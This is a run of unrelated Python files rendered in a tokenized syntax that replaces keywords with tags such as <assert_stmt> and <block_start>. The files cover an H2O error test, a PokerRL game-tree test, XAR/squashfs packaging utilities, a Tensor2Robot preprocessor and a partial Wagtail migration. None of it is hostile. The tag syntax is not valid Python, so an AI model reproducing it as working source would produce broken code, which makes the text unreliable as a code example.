/3/ModelBuilders/gbm"<line_sep>data=mb_err.payload[0]<assert_stmt>data<is><not><none><assert_stmt>data['offset_column']<eq>'foo'<assert_stmt>mb_err.http_status<eq>412# see H2OIllegalArgumentException <assert_stmt>isinstance(mb_err.stacktrace list)<assert_stmt>len(mb_err.stacktrace)<g>10<assert_stmt>"water.exceptions.H2OModelBuilderIllegalArgumentException: Illegal argument(s) for GBM model"<in>mb_err.stacktrace[0]<assert_stmt>"ERRR on field: _offset_column: Offset column 'foo' not found in the training frame"<in>mb_err.msg<assert_stmt>mb_err.dev_msg<eq>mb_err.msg<assert_stmt>mb_err.exception_msg<eq>mb_err.msg<assert_stmt>mb_err.exception_type<eq>"water.exceptions.H2OModelBuilderIllegalArgumentException"<assert_stmt>mb_err.error_url<eq>"/3/ModelBuilders/gbm"<assert_stmt>mb_err.timestamp<g>0<assert_stmt>len(mb_err.values)<eq>4<assert_stmt>{'algo' 'error_count' 'messages' 'parameters'}<eq>set(mb_err.values.keys())<assert_stmt>mb_err.values['algo']<eq>'GBM'<assert_stmt>mb_err.values['error_count']<eq>4# no idea why 4, but adding it to test as it's interesting <assert_stmt>mb_err.values['parameters']['_offset_column']<eq>'foo'<assert_stmt>len(mb_err.values['messages'])<g>1<line_sep>msgs_lev_1=[m<for>m mb_err.values['messages']<if>m['_log_level']<eq>1]<assert_stmt>len(msgs_lev_1)<eq>2<assert_stmt>msgs_lev_1[0]<eq>msgs_lev_1[1]# it is duplicated indeed! 
<assert_stmt>msgs_lev_1[0]['_field_name']<eq>'_offset_column'<assert_stmt>msgs_lev_1[0]['_message']<eq>"Offset column 'foo' not found in the training frame"<line_sep># specific to H2OModelBuilderErrorV3 <assert_stmt>mb_err.error_count<eq>mb_err.values['error_count']<assert_stmt>len(mb_err.messages)<eq>len(mb_err.values['messages'])<assert_stmt>len(mb_err.parameters)<l>len(mb_err.values['parameters'])<block_end><block_end># the exact difference is unclear, other than that on the left side the parameters are accessible with the full schema pu.run_tests([test_backend_error test_model_builds_error])<line_sep>
# Copyright (c) 2019 <NAME> <import_stmt>unittest<import_from_stmt>unittest TestCase<import_stmt>numpy<as>np<import_from_stmt>PokerRL.game._.tree.PublicTree PublicTree<import_from_stmt>PokerRL.game.games StandardLeduc DiscretizedNLLeduc<import_from_stmt>PokerRL.game.wrappers HistoryEnvBuilder<class_stmt>TestGameTree(TestCase)<block_start><def_stmt>test_building self<block_start>_get_leduc_tree()<line_sep>_get_nl_leduc_tree()<block_end><def_stmt>test_vs_env_obs self<block_start><for_stmt>game ["limit" "nl"]<block_start><if_stmt>game<eq>"limit"<block_start>env,env_args=_get_new_leduc_env()<line_sep>dummy_env,env_args=_get_new_leduc_env()<line_sep>tree=_get_leduc_tree(env_args=env_args)<block_end><else_stmt><block_start>env,env_args=_get_new_nl_leduc_env()<line_sep>dummy_env,env_args=_get_new_nl_leduc_env()<line_sep>tree=_get_nl_leduc_tree(env_args=env_args)<block_end>lut_holder=StandardLeduc.get_lut_holder()<line_sep>env.reset()<line_sep>dummy_env.reset()<line_sep>node=tree.root<line_sep># RAISE .. stays preflop legal=env.get_legal_actions()<line_sep>a=2<assert_stmt>a<in>legal<line_sep>o,r,d,i=env.step(a)<line_sep>node=node.children[legal.index(a)]<line_sep>dummy_env.load_state_dict(node.env_state)<line_sep>tree_o=dummy_env.get_current_obs(is_terminal=<false>)<line_sep>env.print_obs(o)<line_sep>env.print_obs(tree_o)<assert_stmt>np.array_equal(o tree_o)<line_sep># CALL .. goes flop legal=env.get_legal_actions()<line_sep>a=1<assert_stmt>a<in>legal<line_sep>o,r,d,i=env.step(a)<line_sep>node=node.children[legal.index(1)]<line_sep>card_that_came_in_env=lut_holder.get_1d_card(env.board[0])<line_sep>node=node.children[card_that_came_in_env]<line_sep>dummy_env.load_state_dict(node.env_state)<line_sep>tree_o=dummy_env.get_current_obs(is_terminal=<false>)<assert_stmt>np.array_equal(o tree_o)<line_sep># RAISE .. 
stays flop legal=env.get_legal_actions()<line_sep>a=legal[-1]<assert_stmt>a<in>legal<line_sep>o,r,d,i=env.step(a)<line_sep>node=node.children[legal.index(a)]<line_sep>dummy_env.load_state_dict(node.env_state)<line_sep>tree_o=dummy_env.get_current_obs(is_terminal=<false>)<assert_stmt>np.array_equal(o tree_o)<block_end><block_end><block_end><def_stmt>_get_leduc_tree env_args=<none><block_start><if_stmt>env_args<is><none><block_start>env_args=StandardLeduc.ARGS_CLS(n_seats=2 )<block_end>env_bldr=HistoryEnvBuilder(env_cls=StandardLeduc env_args=env_args)<line_sep>_tree=PublicTree(env_bldr=env_bldr stack_size=env_args.starting_stack_sizes_list stop_at_street=<none>)<line_sep>_tree.build_tree()<for_stmt>p range(env_bldr.N_SEATS)<block_start>_tree.fill_uniform_random()<block_end>_tree.compute_ev()<line_sep>_tree.export_to_file()<line_sep>print("Tree with stack size" _tree.stack_size "has" _tree.n_nodes "nodes out of which" _tree.n_nonterm "are non-terminal.")<line_sep>print(np.mean(_tree.root.exploitability)<times>env_bldr.env_cls.EV_NORMALIZER)<line_sep><return>_tree<block_end><def_stmt>_get_nl_leduc_tree env_args=<none><block_start><if_stmt>env_args<is><none><block_start>env_args=DiscretizedNLLeduc.ARGS_CLS(n_seats=2 starting_stack_sizes_list=[1000 1000] bet_sizes_list_as_frac_of_pot=[1.0])<block_end>env_bldr=HistoryEnvBuilder(env_cls=DiscretizedNLLeduc env_args=env_args)<line_sep>_tree=PublicTree(env_bldr=env_bldr stack_size=env_args.starting_stack_sizes_list stop_at_street=<none> )<line_sep>_tree.build_tree()<for_stmt>p range(env_bldr.N_SEATS)<block_start>_tree.fill_uniform_random()<block_end>_tree.compute_ev()<line_sep>_tree.export_to_file()<line_sep>print("Tree with stack size" _tree.stack_size "has" _tree.n_nodes "nodes out of which" _tree.n_nonterm "are non-terminal.")<line_sep>print(np.mean(_tree.root.exploitability)<times>env_bldr.env_cls.EV_NORMALIZER)<line_sep><return>_tree<block_end><def_stmt>_get_new_leduc_env env_args=<none><block_start><if_stmt>env_args<is><none><block_start>env_args=StandardLeduc.ARGS_CLS(n_seats=2 starting_stack_sizes_list=[150 150] )<block_end><return>StandardLeduc(env_args=env_args is_evaluating=<true> lut_holder=StandardLeduc.get_lut_holder()) env_args<block_end><def_stmt>_get_new_nl_leduc_env env_args=<none><block_start><if_stmt>env_args<is><none><block_start>env_args=DiscretizedNLLeduc.ARGS_CLS(n_seats=2 bet_sizes_list_as_frac_of_pot=[1.0 1000.0])<block_end><return>DiscretizedNLLeduc(env_args=env_args is_evaluating=<true> lut_holder=DiscretizedNLLeduc.get_lut_holder()) env_args<block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. <import_from_future_stmt> absolute_import division print_function unicode_literals<import_stmt>collections<import_stmt>contextlib<import_stmt>errno<import_stmt>logging<import_stmt>os<import_stmt>shutil<import_stmt>stat<import_stmt>struct<import_stmt>subprocess<import_stmt>sys<import_stmt>tempfile<import_stmt>time<import_stmt>uuid<line_sep>logger=logging.getLogger("xar")<if_stmt>os.path.exists("/etc/centos-release")<block_start>NOGROUP="nobody"<block_end><else_stmt># Works for debian and darwin for sure <block_start>NOGROUP="nogroup"<block_end><def_stmt>make_uuid # ugh line length limit; we need a small uuid <block_start><return>str(uuid.uuid1()).split("-")[0]<block_end><def_stmt>_align_offset offset align=4096<block_start>"""Aligns the offset to the given alignment"""<line_sep>mask=align-1<assert_stmt>(mask&align)<eq>0<line_sep><return>(offset+mask)&(~mask)<block_end><def_stmt>find_mksquashfs # Prefer these paths, if none exist fall back to user's $PATH <block_start>paths=["/usr/sbin/mksquashfs" "/sbin/mksquashfs"]<for_stmt>path paths<block_start><if_stmt>os.path.isfile(path)<and>os.access(path os.X_OK)<block_start><return>path<block_end><block_end><return>"mksquashfs"<block_end><class_stmt>SquashfsOptions(object)<block_start><def_stmt>__init__ self<block_start>self.mksquashfs=find_mksquashfs()<line_sep>self.compression_algorithm="zstd"<line_sep>self.zstd_level=16<line_sep>self.block_size=256<times>1024<block_end><block_end><class_stmt>XarFactory(object)<block_start>"""A class for creating XAR files. Pretty straight forward; take an input directory, output file, and some metadata and produce a XAR file of the contents. """<def_stmt>__init__ self dirname output header_prefix<block_start>self.dirname=dirname<line_sep>self.output=output<line_sep>self.header_prefix=header_prefix<line_sep>self.xar_header={}<line_sep>self.uuid=<none><line_sep>self.version=<none><line_sep>self.sort_file=<none><line_sep>self.squashfs_options=SquashfsOptions()<block_end><def_stmt>go self<block_start>"Make the XAR file."<line_sep>logger.info("Squashing %s to %s"%(self.dirname self.output))<if_stmt>self.uuid<is><none><block_start>self.uuid=make_uuid()<block_end><if_stmt>self.version<is><none><block_start>self.version=time.time()<block_end>tf=tempfile.NamedTemporaryFile(delete=<false>)<line_sep># Create! sqopts=self.squashfs_options<line_sep>cmd=[sqopts.mksquashfs self.dirname tf.name "-noappend" "-noI" "-noX" # is this worth it? probably "-force-uid" "nobody" "-force-gid" NOGROUP "-b" str(sqopts.block_size) "-comp" sqopts.compression_algorithm ]<if_stmt>sqopts.compression_algorithm<eq>"zstd"<block_start>cmd.extend(("-Xcompression-level" str(sqopts.zstd_level)))<block_end><if_stmt>self.sort_file<block_start>cmd.extend(["-sort" self.sort_file])<block_end><if_stmt>sys.stdout.isatty()<block_start>subprocess.check_call(cmd)<block_end><else_stmt><block_start><with_stmt>open("/dev/null" "wb")<as>f<block_start>subprocess.check_call(cmd stdout=f)<block_end><block_end>headers=[self.header_prefix]<line_sep># Take the squash file, create a header, and write it <with_stmt>open(self.output "wb")<as>of# Make a "safe" header that is easily parsed and also not # going to explode if accidentally executed. 
<block_start>headers.append('OFFSET="$OFFSET"')<line_sep>headers.append('UUID="$UUID"')<line_sep>headers.append('VERSION="%d"'%self.version)<for_stmt>key,val self.xar_header.items()<block_start>headers.append('%s="%s"'%(key str(val).replace('"' " ")))<block_end>headers.append("#xar_stop")<line_sep>headers.append("echo This XAR file should not be executed by sh")<line_sep>headers.append("exit 1")<line_sep>headers.append("# Actual squashfs file begins at $OFFSET")<line_sep>text_headers="\n".join(headers)+"\n"<line_sep># 128 is to account for expansion of $OFFSET and $UUID; # it's well over what they might reasonably be. header_size=_align_offset(128+len(text_headers))<line_sep>text_headers=text_headers.replace("$OFFSET" "%d"%header_size)<line_sep>text_headers=text_headers.replace("$UUID" self.uuid)<line_sep>text_headers<augadd>"\n"<times>(header_size-len(text_headers))<line_sep>of.write(text_headers.encode("UTF-8"))<line_sep># Now append the squashfs file to the header. <with_stmt>open(tf.name "rb")<as>rf<block_start><while_stmt><true><block_start>data=rf.read(1024<times>1024)<if_stmt><not>data<block_start><break><block_end>of.write(data)<block_end><block_end><block_end><block_end><block_end><def_stmt>safe_mkdir directory<block_start><try_stmt><block_start>os.makedirs(directory)<block_end><except_stmt>OSError<as>exc<block_start><if_stmt>exc.errno<ne>errno.EEXIST<block_start><raise><block_end><block_end><block_end><def_stmt>safe_remove filename<block_start><try_stmt><block_start>os.unlink(filename)<block_end><except_stmt>OSError<as>e<block_start><if_stmt>e.errno<ne>errno.ENOENT<block_start><raise><block_end><block_end><block_end><def_stmt>safe_rmtree directory<block_start><if_stmt>os.path.exists(directory)<block_start>shutil.rmtree(directory <true>)<block_end><block_end># Simplified version of Chroot from PEX <class_stmt>StagingDirectory(object)<block_start>""" Manages the staging directory. 
"""<class_stmt>Error(Exception)<block_start><pass><block_end><def_stmt>__init__ self staging_dir=<none><block_start>self._staging=os.path.normpath(staging_dir<or>tempfile.mkdtemp())<line_sep>safe_mkdir(self._staging)<block_end><def_stmt>__deepcopy__ self memo<block_start>other=StagingDirectory()<line_sep>memo[id(self)]=other<line_sep>other.copytree(self._staging)<line_sep><return>other<block_end><def_stmt>_normalize self dst<block_start>dst=os.path.normpath(dst)<if_stmt>dst.startswith(os.sep)<or>dst.startswith("..")<block_start><raise>self.Error("Destination path '%s' is not a relative!"%dst)<block_end><return>dst<block_end><def_stmt>_ensure_parent self dst<block_start>safe_mkdir(os.path.dirname(self.absolute(dst)))<block_end><def_stmt>_ensure_not_dst self dst<block_start><if_stmt>self.exists(dst)<block_start><raise>self.Error("Destination path '%s' already exists!"%dst)<block_end><block_end><def_stmt>path self<block_start>"""Returns the root directory of the staging directory."""<line_sep><return>self._staging<block_end><def_stmt>absolute self dst=<none><block_start>"""Returns absolute path for a path relative to staging directory."""<if_stmt>dst<is><none><block_start><return>self._staging<block_end>dst=self._normalize(dst)<line_sep><return>os.path.normpath(os.path.join(self._staging dst))<block_end><def_stmt>delete self<block_start>"""Delete the staging directory."""<line_sep>safe_rmtree(self._staging)<block_end><def_stmt>copy self src dst<block_start>"""Copy src into dst under the staging directory."""<line_sep>dst=self._normalize(dst)<line_sep>self._ensure_parent(dst)<line_sep>self._ensure_not_dst(dst)<line_sep>shutil.copy2(src self.absolute(dst))<block_end><def_stmt>write self data dst mode permissions<block_start>"""Write data into dst."""<line_sep>dst=self._normalize(dst)<line_sep>self._ensure_parent(dst)<line_sep>self._ensure_not_dst(dst)<with_stmt>open(self.absolute(dst) mode)<as>f<block_start>f.write(data)<block_end>os.chmod(self.absolute(dst) permissions)<block_end>@contextlib.contextmanager<def_stmt>postprocess self src<block_start>fpath=self.absolute(src)<line_sep>st=os.stat(fpath)<line_sep>old_times=(st.st_atime st.st_mtime)<with_stmt>tempfile.NamedTemporaryFile(prefix=fpath+"." 
mode="w" delete=<false>)<as>outf<block_start><with_stmt>open(fpath)<as>inf<block_start><yield>inf outf<block_end>outf.flush()<line_sep>os.utime(outf.name old_times)<line_sep>shutil.copystat(fpath outf.name)<line_sep>os.rename(outf.name fpath)<block_end><block_end><def_stmt>_resolve_dst_dir self dst<block_start><if_stmt>dst<is><none># Replace the current staging directory <block_start><if_stmt>os.listdir(self._staging)<ne>[]<block_start><raise>self.Error("Staging directory is not empty!")<block_end># shutil requires that the destination directory does not exist safe_rmtree(self._staging)<line_sep>dst="."<block_end>dst=self._normalize(dst)<line_sep>self._ensure_not_dst(dst)<line_sep><return>dst<block_end><def_stmt>copytree self src dst=<none><block_start>"""Copy src dir into dst under the staging directory."""<line_sep>dst=self._resolve_dst_dir(dst)<line_sep>shutil.copytree(src self.absolute(dst))<block_end><def_stmt>symlink self link dst<block_start>"""Write symbolic link to dst under the staging directory."""<line_sep>dst=self._normalize(dst)<line_sep>self._ensure_parent(dst)<line_sep>self._ensure_not_dst(dst)<line_sep>os.symlink(link self.absolute(dst))<block_end><def_stmt>move self src dst<block_start>"""Move src into dst under the staging directory."""<line_sep>dst=self._normalize(dst)<line_sep>self._ensure_parent(dst)<line_sep>self._ensure_not_dst(dst)<line_sep>shutil.move(src self.absolute(dst))<block_end><def_stmt>exists self dst<block_start>"""Checks if dst exists under the staging directory."""<line_sep>dst=self._normalize(dst)<line_sep><return>os.path.exists(self.absolute(dst))<block_end><def_stmt>extract self zf dst=<none><block_start>"""Extracts the zipfile into dst under the staging directory."""<line_sep>dst=self._resolve_dst_dir(dst)<line_sep>abs_dst=os.path.join(self._staging dst)<line_sep>timestamps={}<for_stmt>zi zf.infolist()<block_start>filename=os.path.join(dst zi.filename)<line_sep>destination=self.absolute(filename)<line_sep>mode=zi.external_attr<rshift>16<if_stmt>stat.S_ISLNK(mode)<block_start>target=zf.read(zi).decode("utf-8")<line_sep>self.symlink(target filename)<block_end><else_stmt><block_start>self._ensure_parent(filename)<line_sep>zf.extract(zi path=abs_dst)<line_sep>os.chmod(destination stat.S_IMODE(mode))<block_end># Use the embedded timestamp for from the pyc file for the # pyc and py file; otherwise, use the timezone-less # timestamp from the zipfile (sigh). <if_stmt>filename.endswith(".pyc")<block_start>new_time=extract_pyc_timestamp(destination)<line_sep>timestamps[destination]=new_time# pyc file timestamps[destination[:-1]]=new_time# py file too <block_end><else_stmt><block_start>new_time=tuple((list(zi.date_time)+[0 0 -1]))<line_sep>timestamps[destination]=time.mktime(new_time)<block_end><block_end># Set our timestamps. <for_stmt>path,timestamp timestamps.items()<block_start><try_stmt><block_start>os.utime(path (timestamp timestamp))<block_end><except_stmt>OSError<as>e# Sometimes we had a pyc file but no py file; the utime # would fail. 
<block_start><if_stmt><not>path.endswith(".py")<block_start><raise>e<block_end><block_end><block_end><block_end><block_end><class_stmt>TemporaryFile(object)<block_start>"""Wrapper around a temporary file that supports deepcopy()."""<def_stmt>__init__ self<block_start><with_stmt>tempfile.NamedTemporaryFile(mode="w+" delete=<false>)<as>f<block_start>self._filename=f.name<block_end><block_end><def_stmt>open self mode=<none><block_start><return>open(self._filename mode)<block_end><def_stmt>name self<block_start><return>self._filename<block_end><def_stmt>delete self<block_start>safe_remove(self._filename)<block_end><def_stmt>__deepcopy__ self memo<block_start>other=TemporaryFile()<line_sep>memo[id(self)]=other<with_stmt>self.open("rb")<as>src other.open("wb")<as>dst<block_start>shutil.copyfileobj(src dst)<block_end><return>other<block_end><block_end># Simple class to represent a partition destination. Each destination # is a path and a uuid from which the contents come (ie, the uuid of # the spar file that contains the file that is moved into the # partition; used for symlink construction). PartitionDestination=collections.namedtuple("PartitionDestination" "staging uuid")<def_stmt>partition_files staging extension_destinations<block_start>"""Partition source_dir into multiple output directories. A partition is defined by extension_destinations which maps suffixes (such as ".debuginfo") to a PartitionDestination instance. dest_dir contains all files that aren't in a partition, and symlinks for ones that are. symlinks are relative and of the form "../../../uuid/path/to/file" so that the final symlinks are correct relative to /mnt/xar/.... """<line_sep>source_dir=staging.path()<line_sep>source_dir=source_dir.rstrip("/")<for_stmt>dirpath,_dirnames,filenames os.walk(staging.path())# path relative to source_dir; used for creating the right # file inside the staging dir <block_start>relative_dirname=dirpath[len(source_dir)+1:]<line_sep># Special case; if a file is in the root of source_dir, then # relative_dirname is empty, but that has the same number of # '/' as just 'bin', so we need to special case it the empty # value. <if_stmt><not>relative_dirname<block_start>relative_depth=1<block_end><else_stmt><block_start>relative_depth=2+relative_dirname.count("/")<block_end><for_stmt>filename filenames# Does this extension map to a separate output? <block_start>_,extension=os.path.splitext(filename)<line_sep>dest_base=extension_destinations.get(extension <none>)<line_sep># This path stays in the source staging directory <if_stmt>dest_base<is><none><block_start><continue><block_end># This file is destined for another tree, make a # relative symlink in source pointing to the # sub-xar destination. relative_path=os.path.join(relative_dirname filename)<line_sep>source_path=staging.absolute(relative_path)<line_sep>dest_base.staging.move(source_path relative_path)<line_sep>dependency_mountpoint=dest_base.uuid<line_sep>staging_symlink=os.path.join("../"<times>relative_depth dependency_mountpoint relative_path)<line_sep>logging.info("%s %s"%(staging_symlink source_path))<line_sep>staging.symlink(staging_symlink relative_path)<block_end><block_end><block_end><def_stmt>write_sort_file staging_dir extension_priorities sort_file<block_start>""" Write a sort file for mksquashfs to colocate some files at the beginning. Files are assigned priority by extension, with files earlier in the list appearing first. The result is written to the file object sort_file. 
mksquashfs takes the sort file with the option '-sort sort_filename'. """<for_stmt>dirpath,_dirname,filenames os.walk(staging_dir)<block_start><for_stmt>filename filenames<block_start>fn=os.path.join(dirpath filename)<for_stmt>idx,suffix enumerate(extension_priorities)<block_start><if_stmt>fn.endswith(suffix)# Default priority is 0; make ours all # negative so we can not list files with # spaces in the name, making them default # to 0 <block_start>priority=idx-len(extension_priorities)-1<line_sep><break><block_end><block_end><assert_stmt>fn.startswith(staging_dir+"/")<line_sep>fn=fn[len(staging_dir)+1:]<line_sep># Older versions of mksquashfs don't like spaces # in filenames; let them have the default priority # of 0. <if_stmt>" "<not><in>fn<block_start>sort_file.write("%s %d\n"%(fn priority))<block_end><block_end><block_end><block_end><def_stmt>extract_pyc_timestamp path<block_start>"Extract the embedded timestamp from a pyc file"<line_sep># A PYC file has a four byte header then four byte timestamp. The # timestamp must match the timestamp on the py file, otherwise the # interpreter will attempt to re-compile the py file. We extract # the timestamp to adulterate the py/pyc files before squashing # them. <with_stmt>open(path "rb")<as>fh<block_start>prefix=fh.read(8)<line_sep><return>struct.unpack(b"<I" prefix[4:])[0]<block_end><block_end><def_stmt>file_in_zip zf filename<block_start>"""Returns True if :filename: is present in the zipfile :zf:."""<try_stmt><block_start>zf.getinfo(filename)<line_sep><return><true><block_end><except_stmt>KeyError<block_start><return><false><block_end><block_end><def_stmt>yield_prefixes_reverse path<block_start>""" Yields all prefixes of :path: in reverse. list(yield_prefixes_reverse("/a/b")) == ["/a/b", "/a", "/"] list(yield_prefixes_reverse("a/b")) == ["a/b", "a", ""] """<line_sep>old=<none><while_stmt>path<ne>old<block_start><yield>path<line_sep>old=path<line_sep>path,_=os.path.split(path)<block_end><block_end>
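# Hedged, self-contained sanity check (not part of the original file) for the two pure helpers above; the # expected values follow directly from their definitions: _align_offset rounds an offset up to the next # multiple of the 4096-byte default alignment, and yield_prefixes_reverse walks a path up to its root. <if_stmt>__name__<eq>'__main__'<block_start><assert_stmt>_align_offset(0)<eq>0<assert_stmt>_align_offset(1)<eq>4096<assert_stmt>_align_offset(4096)<eq>4096<assert_stmt>_align_offset(5000)<eq>8192<assert_stmt>list(yield_prefixes_reverse("/a/b"))<eq>["/a/b" "/a" "/"]<assert_stmt>list(yield_prefixes_reverse("a/b"))<eq>["a/b" "a" ""]<line_sep>print("xar_util helper sanity checks passed")<block_end>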
# coding=utf-8 # Copyright 2021 The Tensor2Robot Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as python3 """The abstract preprocessor, handling boilerplate validation."""<import_stmt>abc<import_from_stmt>typing Any Callable Optional Tuple<import_stmt>six<import_from_stmt>tensor2robot.utils tensorspec_utils<import_stmt>tensorflow.compat.v1<as>tf<line_sep>ModeKeys=tf.estimator.ModeKeys<class_stmt>AbstractPreprocessor(six.with_metaclass(abc.ABCMeta object))<block_start>"""A per example preprocessing function executed prior to the model_fn. Note, our preprocessor is invoked for a batch of features and labels. If the _preprocess_fn can only operate on batch_size one please use tf.map_fn as described in _preprocessor_fn. """<def_stmt>__init__ self model_feature_specification_fn=<none> model_label_specification_fn=<none> is_model_device_tpu=<false><block_start>"""Initialize an instance. The provided specifications are used both for the in and out specification. The _preprocess_fn will not alter the provided tensors. Args: model_feature_specification_fn: (Optional) A function which takes mode as an argument and returns a valid spec structure for the features, preferablely a (hierarchical) namedtuple of TensorSpecs and OptionalTensorSpecs. model_label_specification_fn: (Optional) A function which takes mode as an argument and returns a valid spec structure for the labels, preferably a (hierarchical) namedtupel of TensorSpecs and OptionalTensorSpecs. is_model_device_tpu: True if the model is operating on TPU and otherwise False. This information is useful to do type conversions and strip unnecessary information from preprocessing since no summaries are generated on TPUs. """<for_stmt>spec_generator [model_feature_specification_fn model_label_specification_fn]<block_start><for_stmt>estimator_mode [ModeKeys.TRAIN ModeKeys.PREDICT ModeKeys.EVAL]<block_start><if_stmt>spec_generator<block_start>tensorspec_utils.assert_valid_spec_structure(spec_generator(estimator_mode))<block_end><block_end><block_end>self._model_feature_specification_fn=model_feature_specification_fn<line_sep>self._model_label_specification_fn=model_label_specification_fn<line_sep>self._is_model_device_tpu=is_model_device_tpu<block_end>@property<def_stmt>model_feature_specification_fn self<block_start><return>self._model_feature_specification_fn<block_end>@model_feature_specification_fn.setter<def_stmt>model_feature_specification_fn self model_feature_specification_fn<block_start>self._model_feature_specification_fn=model_feature_specification_fn<block_end>@property<def_stmt>model_label_specification_fn self<block_start><return>self._model_label_specification_fn<block_end>@model_label_specification_fn.setter<def_stmt>model_label_specification_fn self model_label_specification_fn<block_start>self._model_label_specification_fn=model_label_specification_fn<block_end>@abc.abstractmethod<def_stmt>get_in_feature_specification self mode<block_start>"""The specification for the input features for the preprocess_fn. 
Arguments: mode: mode key for this feature specification Returns: A TensorSpecStruct describing the required and optional tensors. """<block_end>@abc.abstractmethod<def_stmt>get_in_label_specification self mode<block_start>"""The specification for the input labels for the preprocess_fn. Arguments: mode: mode key for this feature specification Returns: A TensorSpecStruct describing the required and optional tensors. """<block_end>@abc.abstractmethod<def_stmt>get_out_feature_specification self mode<block_start>"""The specification for the output features after executing preprocess_fn. Arguments: mode: mode key for this feature specification Returns: A TensorSpecStruct describing the required and optional tensors. """<block_end>@abc.abstractmethod<def_stmt>get_out_label_specification self mode<block_start>"""The specification for the output labels after executing preprocess_fn. Arguments: mode: mode key for this feature specification Returns: A TensorSpecStruct describing the required and optional tensors. """<block_end>@abc.abstractmethod<def_stmt>_preprocess_fn self features labels mode<block_start>"""The preprocessing function which will be executed prior to the model_fn. Note, _preprocess_fn is invoked for a batch of features and labels. If the _preprocess_fn can only operate on batch_size one please use the following pattern. def _fn(features_single_batch, labels_single_batch): # The actual implementation return = tf.map_fn( _fn, # The single batch implementation (features, labels), # Our nested structure, the first dimension unpacked dtype=(self.get_out_feature_specification(), self.get_out_labels_specification()), back_prop=False, parallel_iterations=self._parallel_iterations) Args: features: The input features extracted from a single example in our in_feature_specification format. labels: (Optional None) The input labels extracted from a single example in our in_label_specification format. mode: (ModeKeys) Specifies if this is training, evaluation or prediction. Returns: features_preprocessed: The preprocessed features, potentially adding additional tensors derived from the input features. labels_preprocessed: (Optional) The preprocessed labels, potentially adding additional tensors derived from the input features and labels. """<block_end><def_stmt>preprocess self features labels mode<block_start>"""The function which preprocesses the features and labels per example. Note, this function performs the boilerplate packing and flattening and verification of the features and labels according to our spec. The actual preprocessing is performed by _preprocess_fn. Args: features: The features of a single example. labels: (Optional None) The labels of a single example. mode: (ModeKeys) Specifies if this is training, evaluation or prediction. Returns: features_preprocessed: The preprocessed and flattened features verified to fulfill our output specs. labels_preprocessed: (Optional None) The preprocessed and flattened labels verified to fulfill our output specs. """<line_sep># First, we verify that the input features and labels fulfill our spec. 
# We further pack the flattened features and labels to our (hierarchical) # specification.: features=tensorspec_utils.validate_and_pack(expected_spec=self.get_in_feature_specification(mode) actual_tensors_or_spec=features ignore_batch=<true>)<if_stmt>labels<is><not><none><block_start>labels=tensorspec_utils.validate_and_pack(expected_spec=self.get_in_label_specification(mode) actual_tensors_or_spec=labels ignore_batch=<true>)<block_end>features_preprocessed,labels_preprocessed=self._preprocess_fn(features=features labels=labels mode=mode)<line_sep>features_preprocessed=tensorspec_utils.validate_and_flatten(expected_spec=self.get_out_feature_specification(mode) actual_tensors_or_spec=features_preprocessed ignore_batch=<true>)<if_stmt>labels_preprocessed<block_start>labels_preprocessed=tensorspec_utils.validate_and_flatten(expected_spec=self.get_out_label_specification(mode) actual_tensors_or_spec=labels_preprocessed ignore_batch=<true>)<block_end><return>features_preprocessed labels_preprocessed<block_end><block_end>
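# Hedged sketch, not part of this module: the smallest concrete subclass, shown only to illustrate which # methods a preprocessor has to provide. The spec-building function `spec_fn` is assumed to come from the # caller (e.g. built elsewhere with tensorspec_utils) and the preprocessing itself is a no-op pass-through. <class_stmt>_IdentityPreprocessor(AbstractPreprocessor)<block_start>"""Passes features and labels through unchanged; in and out specs are identical."""<def_stmt>__init__ self spec_fn **kwargs<block_start>super(_IdentityPreprocessor self).__init__(model_feature_specification_fn=spec_fn model_label_specification_fn=spec_fn **kwargs)<block_end><def_stmt>get_in_feature_specification self mode<block_start><return>self.model_feature_specification_fn(mode)<block_end><def_stmt>get_in_label_specification self mode<block_start><return>self.model_label_specification_fn(mode)<block_end><def_stmt>get_out_feature_specification self mode<block_start><return>self.model_feature_specification_fn(mode)<block_end><def_stmt>get_out_label_specification self mode<block_start><return>self.model_label_specification_fn(mode)<block_end><def_stmt>_preprocess_fn self features labels mode<block_start><return>features labels<block_end><block_end>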
# -*- coding: utf-8 -*- # Generated by Django 1.11.1 on 2017-08-08 13:59 <import_from_future_stmt> unicode_literals<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<import_stmt>modelcluster.fields<import_stmt>wagtail.core.fields<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('wagtailimages' '0019_delete_filter') ('wagtaildocs' '0007_merge') ('wagtailcore' '0039_collectionviewrestriction') ('pages' '0012_auto_20170606_1319') ]<line_sep>operations=[migrations.CreateModel(name='VideoPage' fields=[('page_ptr' models.OneToOneField(auto_created=<true> on_delete=django.db.models.deletion.CASCADE parent_link=<true> primary_key=<true> serialize=<false> to='wagtailcore.Page')) ('intro' wagtail.core.fields.RichTextField(blank=<true>)) ('template_string' models.CharField(choices=[(b'pages/video_gallery_page.html' b'Videos Page')] default=b'pages/video_gallery_page.html' max_length=255)) ('feed_image' models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='+' to='wagtailimages.Image')) ] options={'abstract':<false> } bases=('wagtailcore.page' ) ) migrations.CreateModel(name='VideoPageCarouselItem' fields=[('id' models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name='ID')) ('sort_order' models.IntegerField(blank=<true> editable=<false> null=<true>)) ('link_external' models.URLField(blank=<true> verbose_name=b'External link')) ('embed_url' models.URLField(blank=<true> verbose_name=b'Embed URL')) ('caption' wagtail.core.fields.RichTextField(blank=<true>)) ('image' models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='+' to='wagtailimages.Image')) ('link_document' models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name='+' to='wagtaildocs.Document')) ('link_page' models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name='+' to='wagtailcore.Page')) ('page' modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE 